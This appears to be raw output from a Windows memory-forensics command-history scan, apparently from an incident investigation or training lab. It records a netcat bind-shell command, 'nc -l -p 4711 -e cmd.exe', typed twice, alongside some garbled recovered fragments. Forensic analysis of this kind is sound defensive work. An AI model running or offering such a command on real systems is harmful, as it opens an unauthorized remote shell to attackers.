**************************************************
CommandProcess: csrss.exe Pid: 564
CommandHistory: 0x4f4d88 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x338
Cmd #0 @ 0x4f2370: nc -l -p 4711 -e cmd.exe
Cmd #1 @ 0x12732d8: cd Desktop
Cmd #2 @ 0x1273398: nc -l -p 4711 -e cmd.exe
**************************************************
CommandProcess: csrss.exe Pid: 564
CommandHistory: 0x1273488 Application: NC.EXE Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5b0
**************************************************
CommandProcess: csrss.exe Pid: 564
CommandHistory: 0x127f9c0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x6a8
Cmd #1 @ 0x12735a8: O?O?
Cmd #2 @ 0x4fcf50: Otstat.exe
